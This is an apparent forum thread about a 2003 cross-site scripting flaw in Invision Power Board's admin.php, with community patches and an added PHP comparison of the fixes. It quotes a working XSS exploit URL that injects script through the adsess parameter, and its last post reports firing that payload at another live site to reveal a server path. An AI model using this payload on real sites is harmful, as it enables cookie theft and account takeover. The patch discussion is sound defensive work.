whisker
Hi,

I just read this just in case you are interested:
QUOTE

A demonstration exploit URL is provided:

http://forums.invisionpower.com/admin.php?adsess='><script>window.open(window.location.search.substring(78));</script><http://binaryvision.tech.nu?BoyBear$$$From$$$BinaryVision


Impact:  A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the Invision Power Board software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.


Solution:  No solution was available at the time of this entry.


Vendor URL:  www.invisionboard.com/ (Links to External Site)
woutiir
Hey Whisker,

Nice post mate, I and many others (WHO DON'T REPLY) are really thankful for these posts. So please keep 'em coming!

Greetings,
woutiir
Fletcher
Yes, very interesting.
GSecur
Yeah great post whisker, packet just posted some information on this but it was a bit more vague.

As for this exploit, everyone should always be wary of what links they click on. And also don't save your password in the cookies!
packet
Yeah, sorry... my post was from the original bugtraq post by the researcher and I forgot that I needed to put CODE around it instead of QUOTE as it interpreted the code.

DOH!

--P.G.
packet
An *unofficial* fix for the recent IB exploit from silent needle:

CODE

In-Reply-To: <20030809082131.25004.qmail@www.securityfocus.com>

To patch the forum, all you have to do is add these lines at the beginning of admin.php

======admin.php======
<?php

// Refuse the request if adsess contains a single quote.
// Note: $adsess is only populated here when register_globals is enabled.
if (strstr($adsess,"'") !== false){
 echo "Silent Needle: i don't like you.<br>dont try to hack. :) [be a white hat don't be a black hat]<br><a href='index.php'>index.php</a>";
 exit;
}

// Refuse the request if adsess contains a double quote.
if (strstr($adsess,"\"") !== false){
 echo "Silent Needle: i don't like you.<br>dont try to hack. :) [be a white hat don't be a black hat]<br><a href='index.php'>index.php</a>";
 exit;
}

//.........
//rest of code
=====================

This works for me and I hope it works for you too.

Oh Long Night
greetz to: SP.IC, NetSpider, ARAB-HAK, zalaboza, C0NIk, and all arabsecure.net t34m..

Silent Needle
member of ArabSecure.net t34m
silentneedle@hotmail.com
GSecur
LOL nice code post packet, I'll have to check it out. I like the messages it sends
packet
For a more concise fix (but not as fun) the original hacker (boy bear) posted this to bugtraq today:

CODE

In-Reply-To: <20030809082131.25004.qmail@www.securityfocus.com>

To repair the bug, edit the file admin.php and add after the line:

$IN['AD_SESS'] = $HTTP_POST_VARS['adsess'] ? $HTTP_POST_VARS['adsess'] : $HTTP_GET_VARS['adsess'];

this:

// HTML-encode the admin session value before it is written back into the page
if (isset($IN['AD_SESS'])) {
    $IN['AD_SESS'] = htmlspecialchars($IN['AD_SESS']);
}



And is it just me or does Boy Bear sound a little... well... you know? I mean I totally respect that and all, I mean they call me a bear cause I'm hairy too. I try to tell them that us gophers are just naturally hairy but they don't seem to care. Hmmm... boy gopher doesn't have the same ring to it though does it?

--P.G. (AKA the other boy wonder)
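
The two fixes posted above, compared side by side in an added example that is not from any poster in this thread or from Invision Power Board. The function names are hypothetical, the sample values are constructed and inert, and two things are assumed: that `adsess` is reflected inside a single-quoted HTML attribute (as the `'>` prefix of the demonstration URL suggests) and that a legitimate `adsess` is a 32-character hex token.

```php
<?php
// Added example (not Invision Power Board code): compares the two fixes from
// this thread with a stricter allow-list check.

// Silent Needle's fix: refuse any value containing ' or ".
function rejects_quotes(string $v): bool {
    return strpbrk($v, "'\"") !== false;
}

// Boy Bear's fix as PHP ran it in 2003: the default flag was ENT_COMPAT,
// which encodes < > & " but leaves ' untouched.
function encode_2003(string $v): string {
    return htmlspecialchars($v, ENT_COMPAT, 'UTF-8');
}

// Same call with ENT_QUOTES, so ' is encoded as &#039; as well.
function encode_quotes(string $v): string {
    return htmlspecialchars($v, ENT_QUOTES, 'UTF-8');
}

// Assumption: a legitimate adsess is a 32-character lowercase hex token.
function is_valid_adsess(string $v): bool {
    return preg_match('/\A[a-f0-9]{32}\z/', $v) === 1;
}

// Constructed sample values; the markup in them is inert.
$samples = [
    'session token'    => '0123456789abcdef0123456789abcdef',
    'tag, no quotes'   => '<b>marker</b>',
    'quote breaks out' => "x' data-marker='1",
];

foreach ($samples as $label => $v) {
    printf("%-17s rejected_by_quote_check=%s valid_token=%s\n",
        $label,
        var_export(rejects_quotes($v), true),
        var_export(is_valid_adsess($v), true));
    // Reflect the value into a single-quoted attribute (assumed context).
    printf("  ENT_COMPAT: <input value='%s'>\n", encode_2003($v));
    printf("  ENT_QUOTES: <input value='%s'>\n", encode_quotes($v));
}
```

The quote-free sample passes the quote check, and the single-quote sample comes through `ENT_COMPAT` unchanged, so it still closes the attribute. Only the token check refuses both.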
Black_hat
QUOTE
be a white hat don't be a black hat


It's a good message.

After sending this query to this address: http://dns2go.deerfield.com/status/index.h...36;BinaryVision

the result gives me the physical location (on the host machine)

C:\INETPUB\WWWROOT\V5\DEERFIELD.COM\PRODUCTS\DNS2GO\STATUS\USERSTATUS.CFM.

Cool

Black_Hat